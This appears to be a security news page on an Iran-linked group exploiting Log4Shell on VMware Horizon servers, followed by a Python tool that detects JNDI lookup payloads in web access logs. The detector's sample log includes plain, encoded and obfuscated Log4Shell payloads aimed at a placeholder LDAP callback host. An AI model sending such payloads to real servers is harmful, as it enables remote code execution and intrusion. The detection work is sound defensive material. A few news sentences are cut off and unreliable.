A "potentially destructive actor" aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability (Log4Shell, CVE-2021-44228) to infect unpatched VMware Horizon servers with ransomware.

Cybersecurity firm SentinelOne dubbed the group "TunnelVision" owing to its heavy reliance on tunneling tools, with overlaps in tactics observed with those of a broader group tracked under the moniker Phosphorus, as well as Charming Kitten and Nemesis Kitten.

"TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions," SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.

Also observed alongside Log4Shell is the exploitation of the Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerabilities to gain initial access to target networks for post-exploitation.

"TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement," the researchers said.

The PowerShell commands are used as a launchpad to download tools like Ngrok and to run further commands through reverse shells, which in turn drop a PowerShell backdoor capable of gathering credentials and executing reconnaissance commands.

Throughout the activity, the threat actor is said to have used a GitHub repository named "VmWareHorizon" under the username "protections20" to host the malicious payloads.

The company said it is attributing the attacks to a separate Iranian cluster not because they are unrelated, but because "there is at present insufficient data to treat them as identical to any of the aforementioned attributions."

SentinelOne also said it identified similarities between the mechanism used to execute the reverse web shell and another PowerShell-based implant called PowerLess, which Cybereason researchers disclosed earlier this month.

NHS warns of hackers exploiting Log4Shell in VMware Horizon
By Bill Toulas, January, 09:29 AM

The UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat.

Multiple VMware products were identified as at risk from the Log4j issues, including VMware Horizon, vCenter Server and vRealize Operations. That list represents a very small snapshot of the widespread effect.

CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers. Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2).

Reports emerged over the weekend that VMware ESXi servers left vulnerable and unpatched against a remotely exploitable bug from 2021 were compromised and scrambled by a ransomware variant dubbed.
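The exploitation described above starts with a Log4Shell lookup string delivered in an HTTP request to a public-facing Horizon server, and attackers routinely hide the "jndi:" trigger behind nested lookups and URL encoding so that a naive grep for "${jndi:" misses it. The detector below is an added example written for this page, not code from SentinelOne, the NHS, CISA or VMware: it applies Log4j's inside-out lookup expansion to each access-log line before matching, so obfuscated and encoded payloads collapse to their plain form. The log lines, IP addresses and payload variants are constructed for the example, and the combined-log-format layout is an assumption about how the web tier logs requests.

```python
"""Find Log4Shell (CVE-2021-44228) JNDI lookup payloads in HTTP access logs.

Log4j expands ${...} lookups from the inside out, so attackers hide the
"jndi:" trigger behind nested lookups such as ${lower:j}, ${::-j} or
${env:NaN:-j}. This detector applies the same expansion rules to each log
line before matching. Sample log lines below are constructed for the example.
"""
import re
from urllib.parse import unquote

# A single lookup with no further lookup nested inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A normalized JNDI lookup: capture the scheme (ldap, rmi, dns, ...) and host.
JNDI_RE = re.compile(r"\$\{\s*jndi:\s*(?P<scheme>[a-z]+):/*(?P<host>[^/\s}:]+)", re.I)


def resolve_lookup(body: str) -> str:
    """Expand the lookup types used for obfuscation; keep everything else verbatim."""
    # "${name:-default}" yields the default when name does not resolve, which is
    # how ${::-j} and ${env:NaN:-j} both become the single letter "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.lower() == "lower":
        return arg.lower()
    if sep and prefix.lower() == "upper":
        return arg.upper()
    # jndi:, env:, sys:, date: and friends are left in place for inspection.
    return "${" + body + "}"


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then expand nested lookups until nothing changes."""
    text = unquote(unquote(text))  # two passes catch double-encoded payloads
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(lambda m: resolve_lookup(m.group(1)), text)
        if expanded == text:
            break
        text = expanded
    return text


def scan_line(line: str):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI_RE.search(norm)
    if not m:
        return None
    return {"scheme": m.group("scheme").lower(), "host": m.group("host"), "normalized": norm}


def scan_log(lines):
    """Scan an iterable of access-log lines; return findings with 1-based line numbers."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            hit["line"] = number
            hits.append(hit)
    return hits


# Constructed sample: one benign request and four ways to deliver the same
# payload in the User-Agent field (plain, URL-encoded, default-value
# obfuscation, env-lookup obfuscation). Addresses are documentation ranges.
_REQ = '203.0.113.9 - - [10/Feb/2022:08:14:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" '
SAMPLE_LOG = [
    _REQ + '"Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    _REQ + '"${jndi:ldap://198.51.100.7:1389/a}"',
    _REQ + '"%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D"',
    _REQ + '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"',
    _REQ + '"${${env:NaN:-j}ndi:${env:NaN:-l}dap://198.51.100.7:1389/a}"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi {hit['scheme']} -> {hit['host']}")
```

Feed real logs with `scan_log(open(path))` and treat the extracted host as the attacker's LDAP/RMI callback server, which is the indicator worth pivoting on in firewall and DNS logs. The check only covers what the web tier actually logs; a payload placed in a header that is not written to the access log, or handled by a component logging through a different appender, will not appear here, so log scanning complements rather than replaces patching the Log4j version on Horizon and UAG.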